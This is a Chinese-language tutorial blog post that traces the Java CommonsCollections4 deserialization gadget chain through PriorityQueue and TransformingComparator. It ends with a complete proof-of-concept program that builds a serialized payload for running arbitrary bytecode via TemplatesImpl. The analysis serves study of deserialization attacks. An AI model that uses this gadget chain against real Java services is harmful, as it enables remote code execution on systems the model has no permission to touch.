• Java安全—CommonsCollections4


    引子

    CC4简单来说就是CC3前半部分和CC2后半部分拼接组成的,对于其利用的限制条件与CC2一致,一样需要在commons-collections-4.0版本使用,原因是 TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口,无法被反序列化。 接下来让我们仔细分析一下。

    PriorityQueue

    PriorityQueue是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器comparator的compare()方法 在CC2中,此类用于调用PriorityQueue重写的readObject来作为触发入口

    PriorityQueue中的readObject间接调用了compare() 而compare()最终调用了transform()

    我们先看它的readobject()方法

    1. private void readObject(java.io.ObjectInputStream s)
    2. throws java.io.IOException, ClassNotFoundException {
    3. // Read in size, and any hidden stuff
    4. s.defaultReadObject();
    5. // Read in (and discard) array length
    6. s.readInt();
    7. queue = new Object[size];
    8. // Read in all elements.
    9. for (int i = 0; i < size; i++)
    10. queue[i] = s.readObject();
    11. // Elements are guaranteed to be in "proper order", but the
    12. // spec has never explained what that might be.
    13. heapify();
    14. }

    重写了该方法并在最后调用了heapify()方法,我们跟进一下:

    1. private void heapify() {
    2. for (int i = (size >>> 1) - 1; i >= 0; i--)
    3. siftDown(i, (E) queue[i]);
    4. }

    这里的话需要长度等于2才能进入for循环,我们要怎样改变长度呢。

    这里用到的是该类的add方法,将指定的元素插入此优先级队列。

    heapify()调用了siftdown()方法,继续跟进:

    1. private void siftDown(int k, E x) {
    2. if (comparator != null)
    3. siftDownUsingComparator(k, x);
    4. else
    5. siftDownComparable(k, x);
    6. }

    可以看到判断条件

    if (comparator != null)
    

    调用了

    siftDownUsingComparator(k, x);
    

    在siftDownUsingComparator()又调用了 comparator.compare()。

    TransformingComparator
    可以看到该类在CC3的版本中不能反序列化,在CC4的版本中便可以了。

    TransformingComparator是一个修饰器,和CC1中的ChainedTransformer类似。

    TransformingComparator里面存在compare方法,当我们调用时就会调用传入transformer对象的transform方法具体实现是this.transformer在传入ChainedTransformer后,会调用ChainedTransformer#transform反射链。

    问题

    1.就像刚才heapify里面所说的

    1. private void heapify() {
    2. for (int i = (size >>> 1) - 1; i >= 0; i--)
    3. siftDown(i, (E) queue[i]);
    4. }

    我们要进入循环要修改值,通过add方法。

    1. priorityQueue.add(1);
    2. priorityQueue.add(2);

    2.initialCapacity的值要大于1

    3.comparator != null

    4.通过反射来修改值防止在反序列化前调用,就如之前的链一样,我们到利用时再用反射修改参数。

    类似这个样子:

    1. Class c=transformingComparator.getClass();
    2. Field transformField=c.getDeclaredField("transformer");
    3. transformField.setAccessible(true);
    4. transformField.set(transformingComparator,chainedTransformer);

    我们先放置个反序列化前不会执行这条链的随便一个参数:

    TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
    

    POC

    1. package ysoserial;
    2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
    4. import javassist.convert.TransformWriteField;
    5. import org.apache.commons.collections4.Transformer;
    6. import org.apache.commons.collections4.comparators.TransformingComparator;
    7. import org.apache.commons.collections4.functors.ChainedTransformer;
    8. import org.apache.commons.collections4.functors.ConstantTransformer;
    9. import org.apache.commons.collections4.functors.InstantiateTransformer;
    10. import org.apache.commons.collections4.functors.InvokerTransformer;
    11. import org.apache.commons.collections4.map.LazyMap;
    12. import org.apache.xalan.xsltc.trax.TrAXFilter;
    13. import javax.xml.crypto.dsig.Transform;
    14. import javax.xml.transform.Templates;
    15. import java.io.*;
    16. import java.lang.reflect.*;
    17. import java.nio.file.Files;
    18. import java.nio.file.Paths;
    19. import java.util.HashMap;
    20. import java.util.Map;
    21. import java.util.PriorityQueue;
    22. public class cc4 {
    23. public static void main(String[] args) throws Exception {
    24. TemplatesImpl templates=new TemplatesImpl();
    25. Class tc=templates.getClass();
    26. Field nameField=tc.getDeclaredField("_name");
    27. nameField.setAccessible(true);
    28. nameField.set(templates,"XINO");
    29. Field bytecodesField=tc.getDeclaredField("_bytecodes");
    30. bytecodesField.setAccessible(true);
    31. byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));
    32. byte[][] codes={code};
    33. bytecodesField.set(templates,codes);
    34. Field tfactoryField=tc.getDeclaredField("_tfactory");
    35. tfactoryField.setAccessible(true);
    36. tfactoryField.set(templates,new TransformerFactoryImpl());
    37. InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
    38. //
    39. Transformer[] transformers=new Transformer[]{
    40. new ConstantTransformer(TrAXFilter.class),
    41. instantiateTransformer
    42. };
    43. ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
    44. TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
    45. PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
    46. priorityQueue.add(1);
    47. priorityQueue.add(2);
    48. Class c=transformingComparator.getClass();
    49. Field transformField=c.getDeclaredField("transformer");
    50. transformField.setAccessible(true);
    51. transformField.set(transformingComparator,chainedTransformer);
    52. serialize(priorityQueue);
    53. unserialize("ser.bin");
    54. }
    55. public static void serialize(Object obj) throws Exception{
    56. ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));
    57. oss.writeObject(obj);
    58. }
    59. public static void unserialize(Object obj) throws Exception{
    60. ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));
    61. oss.readObject();
    62. }
    63. }

    结语

    这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。

  • 相关阅读:
    开发者测试2023省赛--UnrolledLinkedList测试用例
    时序预测 | Matlab实现ARIMA-LSTM差分自回归移动差分自回归移动平均模型模型结合长短期记忆神经网络时间序列预测
    国庆作业day6
    创建表
    如何在推荐系统中玩转知识图谱
    RTP和RTCP详解
    基于Python+flask+sqlite+bootstrap框架开发的后台管理系统
    【Spring】 IoC & AOP 控制反转与面向切面编程
    【笔记】结合P02项目——maven继承与聚合
    Kinsoku jikou desu新浪股票接口变动(php)
  • 原文地址:https://blog.csdn.net/Java_ttcd/article/details/126383973